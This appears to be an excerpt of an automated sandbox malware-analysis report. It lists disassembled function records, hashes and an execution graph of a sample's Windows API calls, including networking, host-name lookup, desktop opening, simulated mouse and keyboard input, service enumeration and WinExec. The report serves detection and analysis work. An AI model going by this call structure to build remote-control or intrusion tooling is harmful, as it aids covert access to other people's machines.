                                                                    • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                    • Opcode Fuzzy Hash: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                    • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: _wtol
                                                                    • String ID: GUIFlags$^L@
                                                                    • API String ID: 2131799477-2609156739
                                                                    • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                    • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                    • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                    • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@wsprintf
                                                                    • String ID: (%d%s)
                                                                    • API String ID: 3815514257-2087557067
                                                                    • Opcode ID: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                    • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                    • Opcode Fuzzy Hash: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                    • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                    • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: TextWindow$Length
                                                                    • String ID: t1@
                                                                    • API String ID: 1006428111-473456572
                                                                    • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                    • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                    • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                    • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                    APIs
                                                                    • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: 7-Zip SFX$Could not allocate memory
                                                                    • API String ID: 2030045667-3806377612
                                                                    • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                    • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                    • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                    • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                    Execution Graph

                                                                    Execution Coverage:3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:10.7%
                                                                    Total number of Nodes:1067
                                                                    Total number of Limit Nodes:36
execution_graph: node and edge listing of the rendered Execution Graph figure (function addresses annotated with the Windows APIs they call, e.g. inet_addr/gethostbyname/connect/setsockopt, OpenProcess/OpenProcessToken/ImpersonateLoggedOnUser, CreateToolhelp32Snapshot/Process32First/Process32Next, GetUserObjectInformationA/RevertToSelf, GetTokenInformation/LookupAccountSidA, RegCreateKeyExA/RegSetValueExA/RegDeleteValueA, SetServiceStatus, mouse_event/SystemParametersInfoA, IsDebuggerPresent/SetUnhandledExceptionFilter); the raw listing is not reproduced here.
7ff6dc178bf4 free 70 API calls 23089->23093 23094 7ff6dc0e3874 23089->23094 23092 7ff6dc0e3a8e timeGetTime 23090->23092 23091 7ff6dc178bf4 free 70 API calls 23091->23089 23095 7ff6dc0e3aaf 23092->23095 23093->23094 23096 7ff6dc0e3905 23094->23096 23098 7ff6dc0e38d0 SleepEx 23094->23098 23094->23106 23248 7ff6dc125f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23095->23248 23101 7ff6dc0c3730 _RunAllParam 89 API calls 23096->23101 23098->23094 23098->23106 23255 7ff6dc12ab00 95 API calls _RunAllParam 23099->23255 23100 7ff6dc0e3abc 23102 7ff6dc0e3ac0 EnterCriticalSection 23100->23102 23105 7ff6dc0e3b17 _snprintf 23100->23105 23115 7ff6dc0e3947 23101->23115 23108 7ff6dc0e3af7 23102->23108 23107 7ff6dc0e3bd1 GetComputerNameA 23105->23107 23106->23073 23109 7ff6dc0e3c52 23107->23109 23117 7ff6dc0e3bec 23107->23117 23249 7ff6dc0daed0 89 API calls _snprintf 23108->23249 23111 7ff6dc0e3c83 gethostname 23109->23111 23120 7ff6dc0e3c57 23109->23120 23113 7ff6dc0e3caf 23111->23113 23111->23120 23112 7ff6dc0e3b0d LeaveCriticalSection 23112->23105 23251 7ff6dc0e3220 71 API calls 2 library calls 23113->23251 23234 7ff6dc12a290 23115->23234 23250 7ff6dc178e5c 70 API calls 4 library calls 23117->23250 23119 7ff6dc0e39c2 23119->23106 23122 7ff6dc0c3730 _RunAllParam 89 API calls 23119->23122 23252 7ff6dc12d710 15 API calls 23120->23252 23122->23106 23123 7ff6dc0e3ec4 23123->23106 23253 7ff6dc12d600 14 API calls 23123->23253 23125 7ff6dc0e3eed 23125->23106 23126 7ff6dc0c3730 _RunAllParam 89 API calls 23125->23126 23127 7ff6dc0e3f0d EnterCriticalSection 23126->23127 23129 7ff6dc1792a4 __wtomb_environ 70 API calls 23127->23129 23130 7ff6dc0e3f5f CreateRectRgn 23129->23130 23131 7ff6dc0e3f95 DeleteObject 23130->23131 23132 7ff6dc178bf4 free 70 API calls 23131->23132 23133 7ff6dc0e3faa LeaveCriticalSection 23132->23133 23254 7ff6dc157d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 23133->23254 23196 7ff6dc0e33c1 23195->23196 
23197 7ff6dc12d170 2 API calls 23196->23197 23198 7ff6dc0e33cf 23197->23198 23199 7ff6dc0e33d3 GetLastError 23198->23199 23202 7ff6dc0e33f1 23198->23202 23200 7ff6dc0c3730 _RunAllParam 89 API calls 23199->23200 23200->23202 23201 7ff6dc0c3730 _RunAllParam 89 API calls 23203 7ff6dc0e351a 23201->23203 23204 7ff6dc0c3730 _RunAllParam 89 API calls 23202->23204 23205 7ff6dc0e3441 23202->23205 23203->23069 23204->23205 23205->23201 23206 7ff6dc0e349e 23205->23206 23206->23069 23219 7ff6dc0df980 23207->23219 23209 7ff6dc0dfae6 SleepEx 23209->23219 23210 7ff6dc0dfb50 23222 7ff6dc0dfb49 23210->23222 23271 7ff6dc178bbc 70 API calls swscanf 23210->23271 23211 7ff6dc177220 _getdrive 8 API calls 23213 7ff6dc0dfc50 23211->23213 23213->23071 23213->23075 23214 7ff6dc0dfb8c 23221 7ff6dc0c3730 _RunAllParam 89 API calls 23214->23221 23214->23222 23215 7ff6dc0dfa11 23215->23209 23215->23219 23270 7ff6dc12d890 97 API calls _RunAllParam 23215->23270 23217 7ff6dc0dfa5e EnterCriticalSection 23220 7ff6dc0dfa91 LeaveCriticalSection 23217->23220 23219->23209 23219->23210 23219->23215 23219->23217 23219->23222 23256 7ff6dc177c50 23219->23256 23262 7ff6dc12d1f0 GetTickCount 23219->23262 23220->23219 23221->23222 23222->23211 23225 7ff6dc17854e _snprintf 23223->23225 23224 7ff6dc17ffc8 _errno 70 API calls 23226 7ff6dc178558 23224->23226 23225->23224 23228 7ff6dc178563 23225->23228 23227 7ff6dc1849d4 _invalid_parameter_noinfo 17 API calls 23226->23227 23227->23228 23228->23077 23230 7ff6dc12a340 FindWindowExA 23229->23230 23231 7ff6dc12a35d GetWindowThreadProcessId GetCurrentProcessId 23230->23231 23232 7ff6dc0e3856 23230->23232 23231->23230 23233 7ff6dc12a37c PostMessageA 23231->23233 23232->23089 23232->23091 23232->23094 23233->23232 23235 7ff6dc12a2b0 23234->23235 23236 7ff6dc12a303 23234->23236 23235->23236 23237 7ff6dc12a2b9 FindWindowA 23235->23237 23238 7ff6dc12a340 FindWindowExA 23236->23238 23239 7ff6dc12a2dd PostMessageA 23237->23239 23240 7ff6dc12a2cd 23237->23240 23241 7ff6dc12a35d 
GetWindowThreadProcessId GetCurrentProcessId 23238->23241 23242 7ff6dc12a392 23238->23242 23239->23119 23240->23119 23241->23238 23243 7ff6dc12a37c PostMessageA 23241->23243 23242->23119 23243->23242 23245 7ff6dc12d18a setsockopt 23244->23245 23246 7ff6dc12d182 23244->23246 23245->23246 23247 7ff6dc12d1b5 setsockopt 23245->23247 23246->23088 23247->23088 23248->23100 23249->23112 23250->23109 23251->23120 23252->23123 23253->23125 23255->23106 23257 7ff6dc177c83 _snprintf 23256->23257 23258 7ff6dc17ffc8 _errno 70 API calls 23257->23258 23261 7ff6dc177c98 23257->23261 23259 7ff6dc177c8d 23258->23259 23260 7ff6dc1849d4 _invalid_parameter_noinfo 17 API calls 23259->23260 23260->23261 23261->23219 23263 7ff6dc12d22f 23262->23263 23264 7ff6dc12d2b6 23262->23264 23265 7ff6dc12dd90 11 API calls 23263->23265 23266 7ff6dc12dd90 11 API calls 23264->23266 23267 7ff6dc12d25f 23264->23267 23269 7ff6dc12d25b 23265->23269 23266->23267 23267->23219 23268 7ff6dc12dd90 11 API calls 23268->23269 23269->23264 23269->23267 23269->23268 23270->23215 23271->23214 24026 7ff6dc0ef8c0 72 API calls _getdrive 24027 7ff6dc0e92c0 119 API calls _RunAllParam 24030 7ff6dc0d7ac0 10 API calls _RunAllParam 24032 7ff6dc0e22c0 114 API calls 5 library calls 24034 7ff6dc0ef6f0 10 API calls _getdrive 24035 7ff6dc0e90f0 EnterCriticalSection LeaveCriticalSection 24036 7ff6dc0ed0f0 DialogBoxParamA 24038 7ff6dc0da6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 24040 7ff6dc0c56e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 24041 7ff6dc0f08e0 117 API calls _RunAllParam 24043 7ff6dc0f1ae0 15 API calls _getdrive 23304 7ff6dc0e4cdb 23520 7ff6dc12d890 97 API calls _RunAllParam 23304->23520 23306 7ff6dc0e4cfc 23307 7ff6dc0e4d52 23306->23307 23374 7ff6dc110650 23306->23374 23521 7ff6dc0ef010 SetEvent 23307->23521 23311 7ff6dc0e7c95 23313 7ff6dc0e7cf7 23311->23313 23314 7ff6dc0e7ca6 FlushFileBuffers 23311->23314 23312 7ff6dc0e7c81 Sleep 23312->23311 23316 
7ff6dc0e7d59 23313->23316 23317 7ff6dc0e7d08 FlushFileBuffers 23313->23317 23314->23313 23315 7ff6dc0e7ce6 CloseHandle 23314->23315 23315->23313 23523 7ff6dc12a3b0 93 API calls 2 library calls 23316->23523 23317->23316 23318 7ff6dc0e7d48 CloseHandle 23317->23318 23318->23316 23320 7ff6dc0e7d62 23326 7ff6dc0e7d85 23320->23326 23524 7ff6dc0f2170 16 API calls 23320->23524 23322 7ff6dc0e7d9d CloseDesktop 23325 7ff6dc0e7da7 23322->23325 23329 7ff6dc0e7dbc 23322->23329 23323 7ff6dc0f2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 23367 7ff6dc0e4003 23323->23367 23327 7ff6dc0c3730 _RunAllParam 89 API calls 23325->23327 23326->23322 23326->23329 23327->23329 23328 7ff6dc0e31b0 27 API calls 23328->23367 23331 7ff6dc0c3730 _RunAllParam 89 API calls 23329->23331 23336 7ff6dc0e7dfc GetModuleFileNameA 23331->23336 23332 7ff6dc0ec590 16 API calls 23332->23367 23333 7ff6dc0e419d GetTickCount 23333->23367 23335 7ff6dc0c3730 _RunAllParam 89 API calls 23337 7ff6dc0e4075 OpenInputDesktop 23335->23337 23338 7ff6dc0e7e15 23336->23338 23339 7ff6dc0e7e56 LoadLibraryA 23336->23339 23340 7ff6dc0e7c54 23337->23340 23337->23367 23525 7ff6dc17a140 70 API calls 3 library calls 23338->23525 23343 7ff6dc0e7e6b GetProcAddress 23339->23343 23344 7ff6dc0e7e9d 23339->23344 23348 7ff6dc0c3730 _RunAllParam 89 API calls 23340->23348 23341 7ff6dc12d440 16 API calls 23341->23367 23347 7ff6dc0e7e8f FreeLibrary 23343->23347 23358 7ff6dc0e7edd 23344->23358 23526 7ff6dc0de580 97 API calls _RunAllParam 23344->23526 23345 7ff6dc0c3730 89 API calls _RunAllParam 23345->23367 23346 7ff6dc0e7e26 23346->23339 23347->23344 23349 7ff6dc0e7c72 23348->23349 23349->23311 23349->23312 23353 7ff6dc12d890 97 API calls 23353->23367 23355 7ff6dc0e7c47 CloseDesktop 23355->23340 23355->23349 23357 7ff6dc0e40bf CloseDesktop 23357->23367 23359 7ff6dc0e7fb2 23358->23359 23361 7ff6dc0c3730 _RunAllParam 89 API calls 23358->23361 23360 7ff6dc177220 _getdrive 8 API calls 23359->23360 23362 7ff6dc0e7ff0 
23360->23362 23365 7ff6dc0e7f3e 23361->23365 23363 7ff6dc0e4e2e GetSystemMetrics 23363->23367 23364 7ff6dc0e4eb9 GetSystemMetrics 23364->23367 23527 7ff6dc12ab00 95 API calls _RunAllParam 23365->23527 23367->23323 23367->23328 23367->23332 23367->23333 23367->23335 23367->23341 23367->23345 23367->23349 23367->23353 23367->23355 23367->23357 23367->23363 23367->23364 23368 7ff6dc0e4f76 mouse_event 23367->23368 23369 7ff6dc0e4fd3 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 23367->23369 23370 7ff6dc0e50ad GetCursorPos 23367->23370 23516 7ff6dc12a5b0 98 API calls 2 library calls 23367->23516 23517 7ff6dc12a3b0 93 API calls 2 library calls 23367->23517 23518 7ff6dc1295d0 EnterCriticalSection LeaveCriticalSection 23367->23518 23519 7ff6dc0ec6f0 18 API calls _RunAllParam 23367->23519 23522 7ff6dc0ec4e0 93 API calls _RunAllParam 23367->23522 23368->23367 23369->23367 23371 7ff6dc0e50c4 SystemParametersInfoA SystemParametersInfoA SystemParametersInfoA SystemParametersInfoA 23370->23371 23372 7ff6dc0e5128 mouse_event 23370->23372 23371->23372 23372->23367 23373 7ff6dc0e5155 SystemParametersInfoA SystemParametersInfoA 23372->23373 23373->23367 23375 7ff6dc0c3730 _RunAllParam 89 API calls 23374->23375 23376 7ff6dc11068e 23375->23376 23377 7ff6dc1109af VkKeyScanA 23376->23377 23380 7ff6dc0c3730 _RunAllParam 89 API calls 23376->23380 23384 7ff6dc11102e 23376->23384 23378 7ff6dc1109c2 23377->23378 23379 7ff6dc0c3730 _RunAllParam 89 API calls 23378->23379 23381 7ff6dc110a08 23379->23381 23382 7ff6dc110743 23380->23382 23386 7ff6dc110a13 23381->23386 23387 7ff6dc110d54 GetKeyState 23381->23387 23389 7ff6dc0c3730 _RunAllParam 89 API calls 23382->23389 23383 7ff6dc11109a 23392 7ff6dc1110ee 23383->23392 23562 7ff6dc112ef0 81 API calls 23383->23562 23384->23383 23385 7ff6dc0c3730 _RunAllParam 89 API calls 23384->23385 23385->23383 23388 7ff6dc110d0a 23386->23388 23391 7ff6dc0c3730 _RunAllParam 89 API calls 23386->23391 23390 7ff6dc110d71 23387->23390 
23388->23307 23389->23377 23394 7ff6dc110eaa 23390->23394 23395 7ff6dc110dbf 23390->23395 23397 7ff6dc110a33 23391->23397 23528 7ff6dc111620 23392->23528 23398 7ff6dc0c3730 _RunAllParam 89 API calls 23394->23398 23400 7ff6dc110dc9 GetAsyncKeyState 23395->23400 23401 7ff6dc110e0a 23395->23401 23404 7ff6dc0c3730 _RunAllParam 89 API calls 23397->23404 23407 7ff6dc110fe2 MapVirtualKeyA 23398->23407 23399 7ff6dc1110df 23563 7ff6dc112370 71 API calls 23399->23563 23400->23401 23402 7ff6dc110dd8 MapVirtualKeyA 23400->23402 23405 7ff6dc110e58 23401->23405 23406 7ff6dc110e14 GetAsyncKeyState 23401->23406 23551 7ff6dc0d74c0 18 API calls 23402->23551 23403 7ff6dc111108 23419 7ff6dc11115f GetAsyncKeyState 23403->23419 23438 7ff6dc11111e 23403->23438 23410 7ff6dc110a4b 23404->23410 23413 7ff6dc110e62 GetAsyncKeyState 23405->23413 23414 7ff6dc110eb3 23405->23414 23406->23405 23411 7ff6dc110e24 MapVirtualKeyA 23406->23411 23557 7ff6dc0d74c0 18 API calls 23407->23557 23416 7ff6dc110d37 23410->23416 23417 7ff6dc110a58 23410->23417 23552 7ff6dc0d74c0 18 API calls 23411->23552 23413->23394 23421 7ff6dc110e76 MapVirtualKeyA 23413->23421 23414->23394 23424 7ff6dc110ec6 GetAsyncKeyState 23414->23424 23425 7ff6dc110f17 GetAsyncKeyState 23414->23425 23415 7ff6dc110def 23422 7ff6dc0c3730 _RunAllParam 89 API calls 23415->23422 23426 7ff6dc0c3730 _RunAllParam 89 API calls 23416->23426 23427 7ff6dc110b27 GetAsyncKeyState 23417->23427 23428 7ff6dc110ad4 GetAsyncKeyState 23417->23428 23430 7ff6dc111174 GetAsyncKeyState 23419->23430 23419->23438 23420 7ff6dc111001 23558 7ff6dc1102a0 109 API calls _RunAllParam 23420->23558 23553 7ff6dc0d74c0 18 API calls 23421->23553 23422->23401 23423 7ff6dc11124d MapVirtualKeyA 23565 7ff6dc0d74c0 18 API calls 23423->23565 23424->23394 23439 7ff6dc110eda MapVirtualKeyA 23424->23439 23444 7ff6dc110f27 MapVirtualKeyA 23425->23444 23445 7ff6dc110f62 GetAsyncKeyState 23425->23445 23426->23388 23433 7ff6dc110b77 GetAsyncKeyState 23427->23433 23434 7ff6dc110b3c 
MapVirtualKeyA 23427->23434 23440 7ff6dc110aec MapVirtualKeyA 23428->23440 23441 7ff6dc110b1e 23428->23441 23429 7ff6dc110e3b 23442 7ff6dc0c3730 _RunAllParam 89 API calls 23429->23442 23430->23438 23443 7ff6dc111184 23430->23443 23433->23441 23450 7ff6dc110b87 MapVirtualKeyA 23433->23450 23536 7ff6dc0d74c0 18 API calls 23434->23536 23435 7ff6dc110e8d 23448 7ff6dc0c3730 _RunAllParam 89 API calls 23435->23448 23437 7ff6dc111151 23437->23423 23438->23423 23438->23437 23554 7ff6dc0d74c0 18 API calls 23439->23554 23535 7ff6dc0d74c0 18 API calls 23440->23535 23452 7ff6dc0c3730 _RunAllParam 89 API calls 23441->23452 23442->23405 23443->23438 23461 7ff6dc0c3730 _RunAllParam 89 API calls 23443->23461 23555 7ff6dc0d74c0 18 API calls 23444->23555 23445->23394 23454 7ff6dc110f72 MapVirtualKeyA 23445->23454 23446 7ff6dc11100a 23559 7ff6dc1102a0 109 API calls _RunAllParam 23446->23559 23448->23394 23449 7ff6dc111267 23449->23449 23537 7ff6dc0d74c0 18 API calls 23450->23537 23460 7ff6dc110bf1 MapVirtualKeyA 23452->23460 23556 7ff6dc0d74c0 18 API calls 23454->23556 23457 7ff6dc110b55 23467 7ff6dc0c3730 _RunAllParam 89 API calls 23457->23467 23459 7ff6dc110ef1 23469 7ff6dc0c3730 _RunAllParam 89 API calls 23459->23469 23538 7ff6dc0d74c0 18 API calls 23460->23538 23471 7ff6dc1111a5 23461->23471 23462 7ff6dc110f40 23472 7ff6dc0c3730 _RunAllParam 89 API calls 23462->23472 23464 7ff6dc110b03 23474 7ff6dc0c3730 _RunAllParam 89 API calls 23464->23474 23465 7ff6dc111013 23560 7ff6dc1102a0 109 API calls _RunAllParam 23465->23560 23476 7ff6dc110b73 23467->23476 23468 7ff6dc110ba0 23477 7ff6dc0c3730 _RunAllParam 89 API calls 23468->23477 23469->23394 23479 7ff6dc111206 23471->23479 23480 7ff6dc1111ba 23471->23480 23481 7ff6dc110f5e 23472->23481 23473 7ff6dc110f8b 23482 7ff6dc0c3730 _RunAllParam 89 API calls 23473->23482 23474->23441 23475 7ff6dc11101c 23561 7ff6dc1102a0 109 API calls _RunAllParam 23475->23561 23476->23433 23477->23441 23478 7ff6dc110c08 MapVirtualKeyA 23539 7ff6dc0d74c0 18 
API calls 23478->23539 23488 7ff6dc0c3730 _RunAllParam 89 API calls 23479->23488 23497 7ff6dc1111fd 23479->23497 23487 7ff6dc0c3730 _RunAllParam 89 API calls 23480->23487 23480->23497 23481->23445 23482->23394 23485 7ff6dc111025 23485->23384 23486 7ff6dc110c1f MapVirtualKeyA 23540 7ff6dc0d74c0 18 API calls 23486->23540 23490 7ff6dc1111ce CreateThread CloseHandle 23487->23490 23491 7ff6dc11121a 23488->23491 23490->23497 23564 7ff6dc12a910 116 API calls _RunAllParam 23491->23564 23492 7ff6dc0c3730 _RunAllParam 89 API calls 23495 7ff6dc111230 WinExec 23492->23495 23493 7ff6dc110c36 MapVirtualKeyA 23541 7ff6dc0d74c0 18 API calls 23493->23541 23495->23437 23497->23492 23498 7ff6dc110c53 MapVirtualKeyA 23542 7ff6dc0d74c0 18 API calls 23498->23542 23500 7ff6dc110c6c MapVirtualKeyA 23543 7ff6dc0d74c0 18 API calls 23500->23543 23502 7ff6dc110c89 MapVirtualKeyA 23544 7ff6dc0d74c0 18 API calls 23502->23544 23504 7ff6dc110ca2 MapVirtualKeyA 23545 7ff6dc0d74c0 18 API calls 23504->23545 23506 7ff6dc110cbf MapVirtualKeyA 23546 7ff6dc0d74c0 18 API calls 23506->23546 23508 7ff6dc110cd8 MapVirtualKeyA 23547 7ff6dc0d74c0 18 API calls 23508->23547 23510 7ff6dc110cef 23548 7ff6dc1102a0 109 API calls _RunAllParam 23510->23548 23512 7ff6dc110cf8 23549 7ff6dc1102a0 109 API calls _RunAllParam 23512->23549 23514 7ff6dc110d01 23550 7ff6dc1102a0 109 API calls _RunAllParam 23514->23550 23516->23367 23517->23367 23519->23367 23520->23306 23521->23367 23522->23367 23523->23320 23525->23346 23527->23359 23531 7ff6dc11163b 23528->23531 23529 7ff6dc111665 23529->23403 23531->23529 23566 7ff6dc112f30 23531->23566 23534 7ff6dc11169c 23534->23403 23535->23464 23536->23457 23537->23468 23538->23478 23539->23486 23540->23493 23541->23498 23542->23500 23543->23502 23544->23504 23545->23506 23546->23508 23547->23510 23548->23512 23549->23514 23550->23388 23551->23415 23552->23429 23553->23435 23554->23459 23555->23462 23556->23473 23557->23420 23558->23446 23559->23465 23560->23475 23561->23485 
23562->23399 23563->23392 23564->23497 23565->23449 23570 7ff6dc112ff0 23566->23570 23568 7ff6dc111689 23569 7ff6dc112550 71 API calls 23568->23569 23569->23534 23571 7ff6dc177978 81 API calls 23570->23571 23572 7ff6dc113003 23571->23572 23573 7ff6dc113008 23572->23573 23598 7ff6dc17749c 70 API calls std::exception::operator= 23572->23598 23573->23568 23575 7ff6dc113043 23576 7ff6dc182950 RaiseException 23575->23576 23577 7ff6dc113060 GetWindowLongPtrA 23576->23577 23578 7ff6dc1130b9 23577->23578 23585 7ff6dc113140 23577->23585 23580 7ff6dc1131ae SetWindowLongPtrA GetDlgItem 23578->23580 23584 7ff6dc1130c5 23578->23584 23579 7ff6dc113265 EndDialog 23581 7ff6dc1131a7 23579->23581 23582 7ff6dc1131de SendMessageA GetDlgItem 23580->23582 23583 7ff6dc177220 _getdrive 8 API calls 23581->23583 23587 7ff6dc11320f SetForegroundWindow 23582->23587 23586 7ff6dc11328a 23583->23586 23584->23581 23584->23585 23588 7ff6dc11314a GetDlgItem SendMessageA 23584->23588 23589 7ff6dc1130e4 23584->23589 23585->23579 23586->23568 23593 7ff6dc11322e 23587->23593 23590 7ff6dc11318f 23588->23590 23591 7ff6dc113174 SendMessageA 23588->23591 23589->23581 23592 7ff6dc1130ef GetDlgItem SendMessageA 23589->23592 23590->23579 23591->23590 23592->23585 23594 7ff6dc113117 SendMessageA 23592->23594 23595 7ff6dc11323a GetDlgItem EnableWindow 23593->23595 23596 7ff6dc11324d GetDlgItem EnableWindow 23593->23596 23594->23585 23597 7ff6dc113132 23594->23597 23595->23581 23596->23581 23597->23585 23598->23575 23599 7ff6dc0e80da 23618 7ff6dc0d0270 23599->23618 23601 7ff6dc0e81c6 23602 7ff6dc1792a4 __wtomb_environ 70 API calls 23601->23602 23603 7ff6dc0e81e7 CreateRectRgn 23602->23603 23625 7ff6dc0c21e0 23603->23625 23605 7ff6dc0e8211 LoadLibraryA 23606 7ff6dc0e825e 23605->23606 23607 7ff6dc0e8247 GetProcAddress 23605->23607 23608 7ff6dc0c3730 _RunAllParam 89 API calls 23606->23608 23607->23606 23609 7ff6dc0e828f 23608->23609 23610 7ff6dc0c3730 _RunAllParam 89 API calls 23609->23610 23611 7ff6dc0e82f7 
23610->23611 23612 7ff6dc177978 81 API calls 23611->23612 23613 7ff6dc0e831e 23612->23613 23614 7ff6dc177978 81 API calls 23613->23614 23615 7ff6dc0e8454 23614->23615 23616 7ff6dc0e8469 23615->23616 23627 7ff6dc0d3fb0 23615->23627 23619 7ff6dc1792a4 __wtomb_environ 70 API calls 23618->23619 23620 7ff6dc0d028f CreateRectRgn 23619->23620 23621 7ff6dc1792a4 __wtomb_environ 70 API calls 23620->23621 23622 7ff6dc0d02b3 CreateRectRgn 23621->23622 23623 7ff6dc1792a4 __wtomb_environ 70 API calls 23622->23623 23624 7ff6dc0d02d7 CreateRectRgn 23623->23624 23624->23601 23626 7ff6dc0c2259 23625->23626 23626->23605 23628 7ff6dc0d3fe1 _snprintf 23627->23628 23629 7ff6dc0d408b GetComputerNameA 23628->23629 23630 7ff6dc0d40d0 LoadLibraryA 23629->23630 23631 7ff6dc0d40a6 23629->23631 23632 7ff6dc0d40fd 23630->23632 23633 7ff6dc0d40e6 23630->23633 23631->23630 23632->23616 23635 7ff6dc0ca040 8 API calls 23633->23635 23635->23632 24045 7ff6dc0c5910 13 API calls _getdrive 24046 7ff6dc0eab10 96 API calls 2 library calls 24047 7ff6dc0d3110 73 API calls 2 library calls 24048 7ff6dc0c9910 11 API calls _getdrive 24049 7ff6dc0ca910 99 API calls _RunAllParam 24050 7ff6dc0d0310 73 API calls free 24052 7ff6dc0f0700 9 API calls 24053 7ff6dc0f5100 82 API calls 2 library calls 22857 7ff6dc0c9d00 22878 7ff6dc0c29a0 22857->22878 22859 7ff6dc0c9db3 OpenSCManagerA 22860 7ff6dc0c9de0 EnumServicesStatusA 22859->22860 22861 7ff6dc0c9dc9 22859->22861 22863 7ff6dc0c9e2b GetLastError 22860->22863 22864 7ff6dc0c9fed CloseServiceHandle 22860->22864 22866 7ff6dc177220 _getdrive 8 API calls 22861->22866 22862 7ff6dc0c9d6b 22862->22859 22863->22864 22865 7ff6dc0c9e3c 22863->22865 22864->22861 22865->22864 22868 7ff6dc0c9e54 EnumServicesStatusA 22865->22868 22867 